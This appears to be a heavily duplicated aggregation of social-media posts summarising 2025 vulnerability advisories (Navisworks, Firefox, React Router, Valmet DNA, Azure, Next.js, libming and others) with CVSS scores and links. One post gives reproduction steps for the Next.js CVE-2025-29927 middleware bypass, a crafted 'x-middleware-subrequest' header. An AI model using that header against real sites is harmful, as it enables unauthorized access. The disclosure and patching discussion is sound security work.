Three new CVEs in Autodesk Navisworks this morning. All three are sev:HIGH 7.8 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H.

https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0002

CVE-2025-1658: A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.

CVE-2025-1659: A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.

CVE-2025-1660: A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force a Memory Corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process.

Three new CVEs in Autodesk Navisworks this morning. All three are sev:HIGH 7.8 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H.

https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0002

CVE-2025-1658: A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.

CVE-2025-1659: A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.

CVE-2025-1660: A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force a Memory Corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process.

Three new CVEs in Autodesk Navisworks this morning. All three are sev:HIGH 7.8 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H.

https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0002

CVE-2025-1658: A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.

CVE-2025-1659: A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.

CVE-2025-1660: A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force a Memory Corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process.

Patch your Mozilla things. They released an advisory for Firefox and Thunderbird with four sev:HIGH vulns.

https://www.mozilla.org/en-US/security/advisories/mfsa2025-20/

CVE-2025-3028: Use-after-free triggered by XSLTProcessor

CVE-2025-3031: JIT optimization bug with different stack slot sizes

CVE-2025-3032: Leaking file descriptors from the fork server

CVE-2025-3029: URL bar spoofing via non-BMP Unicode characters

CVE-2025-3035: Tab title disclosure across pages when using AI chatbot

CVE-2025-3033: Opening local .url files could lead to another file being opened

CVE-2025-3030: Memory safety bugs fixed in Firefox 137, Thunderbird 137, Firefox ESR 128.9, and Thunderbird 128.9

CVE-2025-3034: Memory safety bugs fixed in Firefox 137 and Thunderbird 137

Simple and practical vulns like this are always nice to read about and learn from and replicate.

https://github.com/remix-run/react-router/security/advisories/GHSA-4q56-crqp-v477

sev:HIGH 7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

React Router is a multi-strategy router for React bridging the gap from React 18 to React 19. There is a vulnerability in Remix/React Router that affects all Remix 2 and React Router 7 consumers using the Express adapter. Basically, this vulnerability allows anyone to spoof the URL used in an incoming Request by putting a URL pathname in the port section of a URL that is part of a Host or X-Forwarded-Host header sent to a Remix/React Router request handler. This issue has been patched and released in Remix 2.16.3 and React Router 7.4.1.

https://nvd.nist.gov/vuln/detail/CVE-2025-31137

Patch your Mozilla things. They released an advisory for Firefox and Thunderbird with four sev:HIGH vulns.

https://www.mozilla.org/en-US/security/advisories/mfsa2025-20/

CVE-2025-3028: Use-after-free triggered by XSLTProcessor

CVE-2025-3031: JIT optimization bug with different stack slot sizes

CVE-2025-3032: Leaking file descriptors from the fork server

CVE-2025-3029: URL bar spoofing via non-BMP Unicode characters

CVE-2025-3035: Tab title disclosure across pages when using AI chatbot

CVE-2025-3033: Opening local .url files could lead to another file being opened

CVE-2025-3030: Memory safety bugs fixed in Firefox 137, Thunderbird 137, Firefox ESR 128.9, and Thunderbird 128.9

CVE-2025-3034: Memory safety bugs fixed in Firefox 137 and Thunderbird 137

Patch your Mozilla things. They released an advisory for Firefox and Thunderbird with four sev:HIGH vulns.

https://www.mozilla.org/en-US/security/advisories/mfsa2025-20/

CVE-2025-3028: Use-after-free triggered by XSLTProcessor

CVE-2025-3031: JIT optimization bug with different stack slot sizes

CVE-2025-3032: Leaking file descriptors from the fork server

CVE-2025-3029: URL bar spoofing via non-BMP Unicode characters

CVE-2025-3035: Tab title disclosure across pages when using AI chatbot

CVE-2025-3033: Opening local .url files could lead to another file being opened

CVE-2025-3030: Memory safety bugs fixed in Firefox 137, Thunderbird 137, Firefox ESR 128.9, and Thunderbird 128.9

CVE-2025-3034: Memory safety bugs fixed in Firefox 137 and Thunderbird 137

CVE-2025-24259: Leaking Bookmarks on macOS

https://wts.dev/posts/bookmarks-leak/

#HackerNews #CVE202524259 #macOS #Bookmarks #Security #Vulnerability #HackerNews #Cybersecurity

NCSC Finland published some vulns in Valmet DNA, which is a DCS system. Those are always fun to attack and / or defend.

https://www.valmet.com/about-us/about/research-and-development/vulnerabilityadvisories/cve-2025-0416/

sev:HIGH 8.9 - CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/S:N/AU:Y/R:U/V:D/RE:H/U:Amber

Local privilege escalation through insecure DCOM configuration in Valmet DNA versions prior to C2023. The DCOM object Valmet DNA Engineering has permissions that allow it to run commands as a user with the SeImpersonatePrivilege privilege. The SeImpersonatePrivilege privilege is a Windows permission that allows a process to impersonate another user. An attacker can use this vulnerability to escalate their privileges and take complete control of the system.

https://nvd.nist.gov/vuln/detail/CVE-2025-0416

https://www.valmet.com/about-us/about/research-and-development/vulnerabilityadvisories/cve-2025-0417/

sev:HIGH 7.0 - CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/AU:Y/R:A/V:D/RE:L/U:Green

Lack of protection against brute force attacks in Valmet DNA visualization in DNA Operate. The possibility to make an arbitrary number of login attempts without any rate limit gives an attacker an increased chance of guessing passwords and then performing switching operations.

https://nvd.nist.gov/vuln/detail/CVE-2025-0417

https://www.valmet.com/about-us/about/research-and-development/vulnerabilityadvisories/cve-2025-0418/

sev:MED 5.4 - CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/AU:N/R:A/V:D/RE:L/U:Green

Valmet DNA user passwords in plain text. This practice poses a security risk as attackers who gain access to local project data can read the passwords.

https://nvd.nist.gov/vuln/detail/CVE-2025-0418

NCSC Finland published some vulns in Valmet DNA, which is a DCS system. Those are always fun to attack and / or defend.

https://www.valmet.com/about-us/about/research-and-development/vulnerabilityadvisories/cve-2025-0416/

sev:HIGH 8.9 - CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/S:N/AU:Y/R:U/V:D/RE:H/U:Amber

Local privilege escalation through insecure DCOM configuration in Valmet DNA versions prior to C2023. The DCOM object Valmet DNA Engineering has permissions that allow it to run commands as a user with the SeImpersonatePrivilege privilege. The SeImpersonatePrivilege privilege is a Windows permission that allows a process to impersonate another user. An attacker can use this vulnerability to escalate their privileges and take complete control of the system.

https://nvd.nist.gov/vuln/detail/CVE-2025-0416

https://www.valmet.com/about-us/about/research-and-development/vulnerabilityadvisories/cve-2025-0417/

sev:HIGH 7.0 - CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/AU:Y/R:A/V:D/RE:L/U:Green

Lack of protection against brute force attacks in Valmet DNA visualization in DNA Operate. The possibility to make an arbitrary number of login attempts without any rate limit gives an attacker an increased chance of guessing passwords and then performing switching operations.

https://nvd.nist.gov/vuln/detail/CVE-2025-0417

https://www.valmet.com/about-us/about/research-and-development/vulnerabilityadvisories/cve-2025-0418/

sev:MED 5.4 - CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/AU:N/R:A/V:D/RE:L/U:Green

Valmet DNA user passwords in plain text. This practice poses a security risk as attackers who gain access to local project data can read the passwords.

https://nvd.nist.gov/vuln/detail/CVE-2025-0418

NCSC Finland published some vulns in Valmet DNA, which is a DCS system. Those are always fun to attack and / or defend.

https://www.valmet.com/about-us/about/research-and-development/vulnerabilityadvisories/cve-2025-0416/

sev:HIGH 8.9 - CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/S:N/AU:Y/R:U/V:D/RE:H/U:Amber

Local privilege escalation through insecure DCOM configuration in Valmet DNA versions prior to C2023. The DCOM object Valmet DNA Engineering has permissions that allow it to run commands as a user with the SeImpersonatePrivilege privilege. The SeImpersonatePrivilege privilege is a Windows permission that allows a process to impersonate another user. An attacker can use this vulnerability to escalate their privileges and take complete control of the system.

https://nvd.nist.gov/vuln/detail/CVE-2025-0416

https://www.valmet.com/about-us/about/research-and-development/vulnerabilityadvisories/cve-2025-0417/

sev:HIGH 7.0 - CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/AU:Y/R:A/V:D/RE:L/U:Green

Lack of protection against brute force attacks in Valmet DNA visualization in DNA Operate. The possibility to make an arbitrary number of login attempts without any rate limit gives an attacker an increased chance of guessing passwords and then performing switching operations.

https://nvd.nist.gov/vuln/detail/CVE-2025-0417

https://www.valmet.com/about-us/about/research-and-development/vulnerabilityadvisories/cve-2025-0418/

sev:MED 5.4 - CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/AU:N/R:A/V:D/RE:L/U:Green

Valmet DNA user passwords in plain text. This practice poses a security risk as attackers who gain access to local project data can read the passwords.

https://nvd.nist.gov/vuln/detail/CVE-2025-0418

Microsoft:

Critical: Azure Health Bot Elevation of Privilege Vulnerability - CVE-2025-21384 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21384

Critical: Azure Playwright Elevation of Privilege Vulnerability - CVE-2025-26683 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26683 @microsoftsec #cybersecurity #infosec #Azure

Another Microsoft cloud service vuln got patched. They claim no exploitation and it wasn't publicly known so you should be okay but that trust thing is hard.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21384

sev:HIGH 8.3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

An authenticated attacker can exploit an Server-Side Request Forgery (SSRF) vulnerability in Microsoft Azure Health Bot to elevate privileges over a network.

https://nvd.nist.gov/vuln/detail/CVE-2025-21384

Microsoft:

Critical: Azure Health Bot Elevation of Privilege Vulnerability - CVE-2025-21384 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21384

Critical: Azure Playwright Elevation of Privilege Vulnerability - CVE-2025-26683 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26683 @microsoftsec #cybersecurity #infosec #Azure

Microsoft Azure Playwright EoP vuln.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26683

Improper authorization in Azure Playwright allows an unauthorized attacker to elevate privileges over a network.

Microsoft says that it is not publicly disclosed and not EITW so if it's really fixed, you should be good to go. But I would still take a look in your logs to see what you don't see.

CVE-2025-1449: Rockwell Automation Verve Asset Manager Vulnerability Enables Adversaries to Gain Access to Run Arbitrary Commands – Source: socprime.com https://ciso2ciso.com/cve-2025-1449-rockwell-automation-verve-asset-manager-vulnerability-enables-adversaries-to-gain-access-to-run-arbitrary-commands-source-socprime-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #CVE-2025-1449 #Latestthreats #Vulnerability #socprimecom #socprime #Blog #CVE #rce

I for one like seeing command exec in Rockwell Automation products.

https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1723.html

sev:CRIT 9.1 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

A vulnerability exists in the Rockwell Automation Verve Asset Manager due to insufficient variable sanitizing. A portion of the administrative web interface for Verve's Legacy Agentless Device Inventory (ADI) capability (deprecated since the 1.36 release) allows users to change a variable with inadequate sanitizing. If exploited, it could allow a threat actor with administrative access to run arbitrary commands in the context of the container running the service.

https://nvd.nist.gov/vuln/detail/CVE-2025-1449

Another old Fortinet advisory finally getting a CVE published. The advisory is from 2021, the CVE year is 2023, and here we are in 2025.

https://fortiguard.fortinet.com/psirt/FG-IR-21-023

sev:MED 4.5 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L/E:P/RL:U/RC:C

A buffer copy without checking size of input ('classic buffer overflow') in Fortinet FortiMail webmail and administrative interface version 6.4.0 through 6.4.4 and before 6.2.6 and FortiNDR administrative interface version 7.2.0 and before 7.1.0 allows an authenticated attacker with regular webmail access to trigger a buffer overflow and to possibly execute unauthorized code or commands via specifically crafted HTTP requests.

https://nvd.nist.gov/vuln/detail/CVE-2023-33302

Unraid with Tailscale is pretty popular so maybe go check your targets and / or assets.

https://docs.unraid.net/unraid-os/release-notes/7.0.1/

https://edac.dev/security/CVE-2025-29266/

sev:CRIT 9.6 - CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Unraid 7.0.0 before 7.0.1 allows remote users to access the Unraid WebGUI and web console as root without authentication if a container is running in Host networking mode with Use Tailscale enabled.

https://nvd.nist.gov/vuln/detail/CVE-2025-29266

CVE-2025-31160 Atop 2.11 heap problems

Link: https://openwall.com/lists/oss-security/2025/03/29/1
Discussion: https://news.ycombinator.com/item?id=43518560

CVE-2025-31160 Atop 2.11 heap problems
Link: https://openwall.com/lists/oss-security/2025/03/29/1
Comments: https://news.ycombinator.com/item?id=43518560

CVE-2025-31160 Atop 2.11 heap problems
https://openwall.com/lists/oss-security/2025/03/29/1
#ycombinator

CVE-2025-31160 Atop 2.11 heap problems

https://openwall.com/lists/oss-security/2025/03/29/1

#HackerNews #CVE-2025-31160 #heap #vulnerabilities #security #issues #OpenWall #OSS #security

Details about CVE-2025-31160 (memory corruption in #atop) are now available here: https://github.com/Atoptool/atop/issues/334

In a nutshell: atop at startup connects to local (non-privileged) TCP port 59123 where it expects certain data; if a regular user listens on that port, it can feed data to the next invocation of atop that can corrupt it.

The fix (https://github.com/Atoptool/atop/commit/542b7f7ac52926ca272129dba81d7db80279bb98) is primarily "don't do that" with some attempt at better parsing of the untrusted data (by adding return code checking of `sscanf`).

🚨CVE-2025-2071: OS Command Injection Vulnerability in FAST LTA Silent Brick WebUI

CVSS: 10

https://darkwebinformer.com/cve-2025-2071-os-command-injection-vulnerability-in-fast-lta-silent-brick-webui/

Here's another easy-mode PrivEsc like @wdormann was talking about the other day with his Nessus Agent CVE.

https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00004

sev:MED 6.3 - CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:H/SA:H

The WatchGuard Mobile VPN with SSL Client on Windows does not properly configure directory permissions when installed in a non-default directory. This could allow an authenticated local attacker to escalate to SYSTEM privileges on a vulnerable system. This issue affects Mobile VPN with SSL Client: from 11.0 through 12.11.

https://nvd.nist.gov/vuln/detail/CVE-2025-2781

There are a bunch of CVEs for libming v0.4.0 ( it's a SWF output library ) published today. The issue for them was opened last month with PoCs, but once again, a project isn't using the Security page on its GitHub.

https://github.com/libming/libming/issues/330

https://nvd.nist.gov/vuln/detail/CVE-2025-29483

https://nvd.nist.gov/vuln/detail/CVE-2025-29484

https://nvd.nist.gov/vuln/detail/CVE-2025-29485

https://nvd.nist.gov/vuln/detail/CVE-2025-29486

https://nvd.nist.gov/vuln/detail/CVE-2025-29487

https://nvd.nist.gov/vuln/detail/CVE-2025-29488

https://nvd.nist.gov/vuln/detail/CVE-2025-29489

https://nvd.nist.gov/vuln/detail/CVE-2025-29490

https://nvd.nist.gov/vuln/detail/CVE-2025-29491

https://nvd.nist.gov/vuln/detail/CVE-2025-29492

https://nvd.nist.gov/vuln/detail/CVE-2025-29493

https://nvd.nist.gov/vuln/detail/CVE-2025-29494

https://nvd.nist.gov/vuln/detail/CVE-2025-29496

https://nvd.nist.gov/vuln/detail/CVE-2025-29497

There are a bunch of CVEs for libming v0.4.0 ( it's a SWF output library ) published today. The issue for them was opened last month with PoCs, but once again, a project isn't using the Security page on its GitHub.

https://github.com/libming/libming/issues/330

https://nvd.nist.gov/vuln/detail/CVE-2025-29483

https://nvd.nist.gov/vuln/detail/CVE-2025-29484

https://nvd.nist.gov/vuln/detail/CVE-2025-29485

https://nvd.nist.gov/vuln/detail/CVE-2025-29486

https://nvd.nist.gov/vuln/detail/CVE-2025-29487

https://nvd.nist.gov/vuln/detail/CVE-2025-29488

https://nvd.nist.gov/vuln/detail/CVE-2025-29489

https://nvd.nist.gov/vuln/detail/CVE-2025-29490

https://nvd.nist.gov/vuln/detail/CVE-2025-29491

https://nvd.nist.gov/vuln/detail/CVE-2025-29492

https://nvd.nist.gov/vuln/detail/CVE-2025-29493

https://nvd.nist.gov/vuln/detail/CVE-2025-29494

https://nvd.nist.gov/vuln/detail/CVE-2025-29496

https://nvd.nist.gov/vuln/detail/CVE-2025-29497

There are a bunch of CVEs for libming v0.4.0 ( it's a SWF output library ) published today. The issue for them was opened last month with PoCs, but once again, a project isn't using the Security page on its GitHub.

https://github.com/libming/libming/issues/330

https://nvd.nist.gov/vuln/detail/CVE-2025-29483

https://nvd.nist.gov/vuln/detail/CVE-2025-29484

https://nvd.nist.gov/vuln/detail/CVE-2025-29485

https://nvd.nist.gov/vuln/detail/CVE-2025-29486

https://nvd.nist.gov/vuln/detail/CVE-2025-29487

https://nvd.nist.gov/vuln/detail/CVE-2025-29488

https://nvd.nist.gov/vuln/detail/CVE-2025-29489

https://nvd.nist.gov/vuln/detail/CVE-2025-29490

https://nvd.nist.gov/vuln/detail/CVE-2025-29491

https://nvd.nist.gov/vuln/detail/CVE-2025-29492

https://nvd.nist.gov/vuln/detail/CVE-2025-29493

https://nvd.nist.gov/vuln/detail/CVE-2025-29494

https://nvd.nist.gov/vuln/detail/CVE-2025-29496

https://nvd.nist.gov/vuln/detail/CVE-2025-29497

There are a bunch of CVEs for libming v0.4.0 ( it's a SWF output library ) published today. The issue for them was opened last month with PoCs, but once again, a project isn't using the Security page on its GitHub.

https://github.com/libming/libming/issues/330

https://nvd.nist.gov/vuln/detail/CVE-2025-29483

https://nvd.nist.gov/vuln/detail/CVE-2025-29484

https://nvd.nist.gov/vuln/detail/CVE-2025-29485

https://nvd.nist.gov/vuln/detail/CVE-2025-29486

https://nvd.nist.gov/vuln/detail/CVE-2025-29487

https://nvd.nist.gov/vuln/detail/CVE-2025-29488

https://nvd.nist.gov/vuln/detail/CVE-2025-29489

https://nvd.nist.gov/vuln/detail/CVE-2025-29490

https://nvd.nist.gov/vuln/detail/CVE-2025-29491

https://nvd.nist.gov/vuln/detail/CVE-2025-29492

https://nvd.nist.gov/vuln/detail/CVE-2025-29493

https://nvd.nist.gov/vuln/detail/CVE-2025-29494

https://nvd.nist.gov/vuln/detail/CVE-2025-29496

https://nvd.nist.gov/vuln/detail/CVE-2025-29497

There are a bunch of CVEs for libming v0.4.0 ( it's a SWF output library ) published today. The issue for them was opened last month with PoCs, but once again, a project isn't using the Security page on its GitHub.

https://github.com/libming/libming/issues/330

https://nvd.nist.gov/vuln/detail/CVE-2025-29483

https://nvd.nist.gov/vuln/detail/CVE-2025-29484

https://nvd.nist.gov/vuln/detail/CVE-2025-29485

https://nvd.nist.gov/vuln/detail/CVE-2025-29486

https://nvd.nist.gov/vuln/detail/CVE-2025-29487

https://nvd.nist.gov/vuln/detail/CVE-2025-29488

https://nvd.nist.gov/vuln/detail/CVE-2025-29489

https://nvd.nist.gov/vuln/detail/CVE-2025-29490

https://nvd.nist.gov/vuln/detail/CVE-2025-29491

https://nvd.nist.gov/vuln/detail/CVE-2025-29492

https://nvd.nist.gov/vuln/detail/CVE-2025-29493

https://nvd.nist.gov/vuln/detail/CVE-2025-29494

https://nvd.nist.gov/vuln/detail/CVE-2025-29496

https://nvd.nist.gov/vuln/detail/CVE-2025-29497

Firefox developers reported CVE-2025-2857, a sandbox vulnerability similar to a zero-day reported this week in Google Chrome.

https://therecord.media/firefox-sandbox-vulnerability-similar-chrome-zero-day

Critical Firefox, Tor Browser sandbox escape flaw fixed (CVE-2025-2857)

https://www.helpnetsecurity.com/2025/03/28/critical-firefox-tor-browser-sandbox-escape-flaw-fixed-cve-2025-2857/

#Firefox #Tor

Critical Firefox, Tor Browser sandbox escape flaw fixed (CVE-2025-2857) https://www.helpnetsecurity.com/2025/03/28/critical-firefox-tor-browser-sandbox-escape-flaw-fixed-cve-2025-2857/ #securityupdate #vulnerability #Don'tmiss #Kaspersky #Hotstuff #Firefox #Chrome #Opera #News #Tor

Whoa, talk about déjà vu! Seems like Firefox is playing catch-up right after Chrome dropped a fix for a sandbox escape. 🤯 Keep an eye out for CVE-2025-2857.

So, what's the deal? In short, this nasty bug could let an attacker break right out of the browser's protective sandbox. And *that* means they could potentially gain full access to your system. Yeah, pretty scary stuff. 😱

If you're running Firefox on Windows, heads up! This affects versions 136.0.4, ESR 115.21.1, and ESR 128.8.1. This whole situation feels familiar because Chrome *just* patched CVE-2025-2783, a similar issue that attackers were already actively exploiting out in the wild!

Make no mistake, sandbox escapes are a huge deal. As a pentester, I can tell you: vulnerabilities like this get weaponized *fast*. Don't wait around.

Seriously, update your Firefox ASAP! Trust me, you don't want to deal with the fallout if someone exploits this. It could get costly, fast.

Ever seen a browser exploit do its thing live? Wild, right? Drop your stories below!

#infosec #pentesting #firefox #cybersecurity #updateNOW

Firefox 0-day security vulnerability (CVE-2025-2857) patched

Mozilla patches a sandbox escape vulnerability that is already being exploited (in Chrome)

:firefox:⁠https://www.mozilla.org/en-US/security/advisories/mfsa2025-19/

Announced: 2025-03-27
Impact: ⚠️ critical
Products: Firefox, Firefox ESR (Firefox on Windows only)
Fixed in:
• Firefox 136.0.4 :windows:
• Firefox ESR 115.21.1 :windows:
• Firefox ESR 128.8.1 :windows:

#Firefox #InfoSec #CVE #CVE_2025_2857

There are a bunch of CVEs for libming v0.4.0 ( it's a SWF output library ) published today. The issue for them was opened last month with PoCs, but once again, a project isn't using the Security page on its GitHub.

https://github.com/libming/libming/issues/330

https://nvd.nist.gov/vuln/detail/CVE-2025-29483

https://nvd.nist.gov/vuln/detail/CVE-2025-29484

https://nvd.nist.gov/vuln/detail/CVE-2025-29485

https://nvd.nist.gov/vuln/detail/CVE-2025-29486

https://nvd.nist.gov/vuln/detail/CVE-2025-29487

https://nvd.nist.gov/vuln/detail/CVE-2025-29488

https://nvd.nist.gov/vuln/detail/CVE-2025-29489

https://nvd.nist.gov/vuln/detail/CVE-2025-29490

https://nvd.nist.gov/vuln/detail/CVE-2025-29491

https://nvd.nist.gov/vuln/detail/CVE-2025-29492

https://nvd.nist.gov/vuln/detail/CVE-2025-29493

https://nvd.nist.gov/vuln/detail/CVE-2025-29494

https://nvd.nist.gov/vuln/detail/CVE-2025-29496

https://nvd.nist.gov/vuln/detail/CVE-2025-29497

Vercel found a sev:LOW in doing next dot js code review after CVE-2025-29927 and already published a CVE so that's nice to see.

https://github.com/vercel/next.js/security/advisories/GHSA-223j-4rm8-mrmf

sev:LOW 1.7 - CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U

Next.js is a React framework for building full-stack web applications. To mitigate CVE-2025-29927, Next.js validated the x-middleware-subrequest-id which persisted across multiple incoming requests. However, this subrequest ID is sent to all requests, even if the destination is not the same host as the Next.js application. Initiating a fetch request to a third-party within Middleware will send the x-middleware-subrequest-id to that third party. This vulnerability is fixed in 12.3.6, 13.5.10, 14.2.26, and 15.2.4.

https://nvd.nist.gov/vuln/detail/CVE-2025-30218

Way to go with CVE-2025-29927 Vercel...

Detect NetxJS CVE-2025-29927 efficiently and at scale https://www.patrowl.io/en/actualites/cve-2025-29927-next-js

[Reproduce Steps]
Add Header

x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

to the request
⬇️
"Next.js POC for CVE-2025-29927"
👇
https://github.com/azu/nextjs-cve-2025-29927-poc

@da_667 Yes please. Rapid7 did publish this though: https://www.rapid7.com/blog/post/2025/03/25/etr-notable-vulnerabilities-in-next-js-cve-2025-29927/

It's not much, but it's better than the vendor.

There are a bunch of CVEs for libming v0.4.0 ( it's a SWF output library ) published today. The issue for them was opened last month with PoCs, but once again, a project isn't using the Security page on its GitHub.

https://github.com/libming/libming/issues/330

https://nvd.nist.gov/vuln/detail/CVE-2025-29483

https://nvd.nist.gov/vuln/detail/CVE-2025-29484

https://nvd.nist.gov/vuln/detail/CVE-2025-29485

https://nvd.nist.gov/vuln/detail/CVE-2025-29486

https://nvd.nist.gov/vuln/detail/CVE-2025-29487

https://nvd.nist.gov/vuln/detail/CVE-2025-29488

https://nvd.nist.gov/vuln/detail/CVE-2025-29489

https://nvd.nist.gov/vuln/detail/CVE-2025-29490

https://nvd.nist.gov/vuln/detail/CVE-2025-29491

https://nvd.nist.gov/vuln/detail/CVE-2025-29492

https://nvd.nist.gov/vuln/detail/CVE-2025-29493

https://nvd.nist.gov/vuln/detail/CVE-2025-29494

https://nvd.nist.gov/vuln/detail/CVE-2025-29496

https://nvd.nist.gov/vuln/detail/CVE-2025-29497

There are a bunch of CVEs for libming v0.4.0 ( it's a SWF output library ) published today. The issue for them was opened last month with PoCs, but once again, a project isn't using the Security page on its GitHub.

https://github.com/libming/libming/issues/330

https://nvd.nist.gov/vuln/detail/CVE-2025-29483

https://nvd.nist.gov/vuln/detail/CVE-2025-29484

https://nvd.nist.gov/vuln/detail/CVE-2025-29485

https://nvd.nist.gov/vuln/detail/CVE-2025-29486

https://nvd.nist.gov/vuln/detail/CVE-2025-29487

https://nvd.nist.gov/vuln/detail/CVE-2025-29488

https://nvd.nist.gov/vuln/detail/CVE-2025-29489

https://nvd.nist.gov/vuln/detail/CVE-2025-29490

https://nvd.nist.gov/vuln/detail/CVE-2025-29491

https://nvd.nist.gov/vuln/detail/CVE-2025-29492

https://nvd.nist.gov/vuln/detail/CVE-2025-29493

https://nvd.nist.gov/vuln/detail/CVE-2025-29494

https://nvd.nist.gov/vuln/detail/CVE-2025-29496

https://nvd.nist.gov/vuln/detail/CVE-2025-29497

There are a bunch of CVEs for libming v0.4.0 ( it's a SWF output library ) published today. The issue for them was opened last month with PoCs, but once again, a project isn't using the Security page on its GitHub.

https://github.com/libming/libming/issues/330

https://nvd.nist.gov/vuln/detail/CVE-2025-29483

https://nvd.nist.gov/vuln/detail/CVE-2025-29484

https://nvd.nist.gov/vuln/detail/CVE-2025-29485

https://nvd.nist.gov/vuln/detail/CVE-2025-29486

https://nvd.nist.gov/vuln/detail/CVE-2025-29487

https://nvd.nist.gov/vuln/detail/CVE-2025-29488

https://nvd.nist.gov/vuln/detail/CVE-2025-29489

https://nvd.nist.gov/vuln/detail/CVE-2025-29490

https://nvd.nist.gov/vuln/detail/CVE-2025-29491

https://nvd.nist.gov/vuln/detail/CVE-2025-29492

https://nvd.nist.gov/vuln/detail/CVE-2025-29493

https://nvd.nist.gov/vuln/detail/CVE-2025-29494

https://nvd.nist.gov/vuln/detail/CVE-2025-29496

https://nvd.nist.gov/vuln/detail/CVE-2025-29497

There are a bunch of CVEs for libming v0.4.0 ( it's a SWF output library ) published today. The issue for them was opened last month with PoCs, but once again, a project isn't using the Security page on its GitHub.

https://github.com/libming/libming/issues/330

https://nvd.nist.gov/vuln/detail/CVE-2025-29483

https://nvd.nist.gov/vuln/detail/CVE-2025-29484

https://nvd.nist.gov/vuln/detail/CVE-2025-29485

https://nvd.nist.gov/vuln/detail/CVE-2025-29486

https://nvd.nist.gov/vuln/detail/CVE-2025-29487

https://nvd.nist.gov/vuln/detail/CVE-2025-29488

https://nvd.nist.gov/vuln/detail/CVE-2025-29489

https://nvd.nist.gov/vuln/detail/CVE-2025-29490

https://nvd.nist.gov/vuln/detail/CVE-2025-29491

https://nvd.nist.gov/vuln/detail/CVE-2025-29492

https://nvd.nist.gov/vuln/detail/CVE-2025-29493

https://nvd.nist.gov/vuln/detail/CVE-2025-29494

https://nvd.nist.gov/vuln/detail/CVE-2025-29496

https://nvd.nist.gov/vuln/detail/CVE-2025-29497

There are a bunch of CVEs for libming v0.4.0 ( it's a SWF output library ) published today. The issue for them was opened last month with PoCs, but once again, a project isn't using the Security page on its GitHub.

https://github.com/libming/libming/issues/330

https://nvd.nist.gov/vuln/detail/CVE-2025-29483

https://nvd.nist.gov/vuln/detail/CVE-2025-29484

https://nvd.nist.gov/vuln/detail/CVE-2025-29485

https://nvd.nist.gov/vuln/detail/CVE-2025-29486

https://nvd.nist.gov/vuln/detail/CVE-2025-29487

https://nvd.nist.gov/vuln/detail/CVE-2025-29488

https://nvd.nist.gov/vuln/detail/CVE-2025-29489

https://nvd.nist.gov/vuln/detail/CVE-2025-29490

